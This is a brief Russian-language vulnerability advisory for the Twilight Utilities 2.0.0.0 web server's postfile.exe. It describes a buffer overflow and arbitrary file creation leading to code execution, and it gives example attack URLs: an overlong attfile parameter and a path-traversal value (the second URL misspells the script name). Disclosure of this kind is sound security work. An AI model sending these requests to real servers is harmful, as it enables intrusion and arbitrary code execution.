Программа: Twilight Utilities 2.0.0.0
Две уязвимости обнаружено в Twilight Utilities Web Server в 'postfile.exe'. Удаленный пользователь может загрузить файлы в произвольное местоположение и выполнить произвольный код.
1. Переполнение буфера:
http://[host]/scripts/postfile.exe?attfile=[250+bytes]
2. Создание произвольных файлов:
http://[host]/scripts/postifle.exe?attfile=/../../../../snif.html
